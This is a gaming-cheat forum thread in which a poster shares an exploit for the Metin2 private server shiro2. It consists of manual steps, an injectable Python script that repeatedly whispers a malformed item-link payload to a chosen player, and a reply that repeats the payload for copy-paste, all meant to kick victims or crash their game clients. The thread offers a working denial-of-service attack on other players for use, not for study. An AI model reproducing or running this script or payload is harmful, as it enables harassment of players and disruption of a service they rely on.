Register for your free account! | Forgot your password?

Go Back   elitepvpers > Popular Games > Metin2 > Metin2 Hacks, Bots, Cheats, Exploits & Macros
You last visited: Today at 19:49

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[small exploit] shiro2 kick victim / crash victims client

Discussion on [small exploit] shiro2 kick victim / crash victims client within the Metin2 Hacks, Bots, Cheats, Exploits & Macros forum part of the Metin2 category.

Reply
 
Old   #1

 
Mr. 'Avenue™'s Avatar
 
elite*gold: 222
The Black Market: 101/0/0
Join Date: Oct 2012
Posts: 2,369
Received Thanks: 3,389
[small exploit] shiro2 kick victim / crash victims client

previews

video:


1. choose victim (you have to PN him/her)
2. click the text field in the pn-window
3. hyperlink an item WITH BONUSES from the call-chat (alt + left click)
NOT YOUR OWN ITEM!!!!
4. send the message
5. repeat


other method
1. inject my python script (e.g. load python script with STMod or something else)
2. choose victim
3. click "Kick"

Code:
import player, net, chat, ui
from threading import Timer

text = "|cffffc700|Hitem:1df:0:1df:1df:fd1:0:4:9999:5:9999:1:9999:51:9999:2d:9999|h[Dragon Tooth Blade +9]|h|r"
is_started = 0
delay = 5.5

class KickDialog(ui.Window):
    def __init__(self):
        ui.Window.__init__(self)
        self.t = Timer(delay, self.Kick)

        self.Board = ui.BoardWithTitleBar()
        self.Board.SetSize(225, 100)
        self.Board.SetCenterPosition()
        self.Board.AddFlag("movable")
        self.Board.AddFlag("float")
        self.Board.SetTitleName("Kicker")
        self.Board.SetCloseEvent(self.Close)
        self.Board.Show()

        self.targetNameText = ui.TextLine()
        self.targetNameText.SetParent(self.Board)
        self.targetNameText.SetDefaultFontName()
        self.targetNameText.SetPosition(15, 35)
        self.targetNameText.SetFeather()
        self.targetNameText.SetText("Spielername:")
        self.targetNameText.SetFontColor(1.0, 1.0, 1.0)
        self.targetNameText.SetOutline()
        self.targetNameText.Show()

        self.targetNameSlotBar = ui.SlotBar()
        self.targetNameSlotBar.SetParent(self.Board)
        self.targetNameSlotBar.SetSize(20*7, 14)
        self.targetNameSlotBar.SetPosition(70, 35)
        self.targetNameSlotBar.Show()

        self.targetNameEditLine = ui.EditLine()
        self.targetNameEditLine.SetParent(self.targetNameSlotBar)
        self.targetNameEditLine.SetSize(20*7, 18)
        self.targetNameEditLine.SetPosition(6, 0)
        self.targetNameEditLine.SetMax(20)
        self.targetNameEditLine.SetFocus()
        self.targetNameEditLine.Show()

        self.kickTargetButton = ui.Button()
        self.kickTargetButton.SetParent(self.Board)
        self.kickTargetButton.SetUpVisual("d:/ymir work/ui/public/large_Button_01.sub")
        self.kickTargetButton.SetOverVisual("d:/ymir work/ui/public/large_Button_02.sub")
        self.kickTargetButton.SetDownVisual("d:/ymir work/ui/public/large_Button_03.sub")
        self.kickTargetButton.SetText("Kick")
        self.kickTargetButton.SetPosition(70, 50)
        self.kickTargetButton.SetEvent(ui.__mem_func__(self.Start))
        self.kickTargetButton.Show()

    def __del__(self):
        ui.Window.__del__(self)

    def Close(self):
        self.Board = None
        self.t.cancel()

    def Start(self):
        targetName = self.targetNameEditLine.GetText()
        if self.t.is_alive()   :
            chat.AppendChat(chat.CHAT_TYPE_INFO, "Stopped kicking " + targetName)
            self.t.cancel()
        else:
            chat.AppendChat(chat.CHAT_TYPE_INFO, "Started kicking " + targetName)
            self.KickStart()

    def KickStart(self):
        targetName = self.targetNameEditLine.GetText()
        self.t = Timer(delay, self.Kick)
        chat.AppendChat(chat.CHAT_TYPE_INFO, "Kicking " + targetName + " in " + str(delay) + " seconds")
        self.t.start()

    def Kick(self):
        targetName = self.targetNameEditLine.GetText()
        chat.AppendChat(chat.CHAT_TYPE_INFO, "Kicking " +  targetName + " right now")
        net.SendWhisperPacket(targetName, text)
        chat.AppendWhisper(chat.WHISPER_TYPE_CHAT, targetName, player.GetName() + " : " + text)
        self.KickStart()

StartDialog = KickDialog()
StartDialog.Show()
Mr. 'Avenue™ is offline  
Thanks
1 User
Old 12/17/2022, 04:40   #2
 
elite*gold: 0
Join Date: Dec 2013
Posts: 2
Received Thanks: 0
There is another way to load the py without STMod ? Not all of us have STMod bought.
crcosmin32 is offline  
Old 12/17/2022, 18:30   #3

 
Mr. 'Avenue™'s Avatar
 
elite*gold: 222
The Black Market: 101/0/0
Join Date: Oct 2012
Posts: 2,369
Received Thanks: 3,389
Quote:
Originally Posted by crcosmin32 View Post
There is another way to load the py without STMod ? Not all of us have STMod bought.
Idk, look for metin2 python module loaders.

Another thing you can try:
Ctrl + c (copy) and ingame ctrl+v (paste) this in pn-window:
Code:
 |cffffc700|Hitem:1df:0:1df:1df:fd1:0:4:9999:5:9999:1:9999:51:9999:2d:9999|h[Dragon Tooth Blade +9]|h|r
Mr. 'Avenue™ is offline  
Reply

Tags
bug, exploit, kick, mod, shiro2


Similar Threads Similar Threads
Kick kick kick ?
08/26/2010 - Metin2 Private Server - 29 Replies
Hey leute ich will bei CCm2 spielen ( Hamachi)..alles schön und gut gehe auf die Hp lade mir den ganzen clienten runter..was passiert?Nacher der Charwahl bekomm ich kick..was kann ich dagegen machen?!
Crash. Crash. Crash. Help?
10/30/2009 - Dekaron - 10 Replies
Okay EPVPr's, I have a question for you. Is anyone else having the 2moons/dekaron client crash on them as much as it is for me? I'll explain my full situation unlike alot of people on here(I'm sure most of you guy's know what i'm referring to :p) Situation: I start 2Moons, login. Usually on char select i'll open CE 5.5 from my "Up To Date" .CT file. Other times it will be "in map" depends on the situation as you all know. With as little as only one script activated(or even all) which most...



All times are GMT +1. The time now is 19:50.


Powered by vBulletin®
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2025 elitepvpers All Rights Reserved.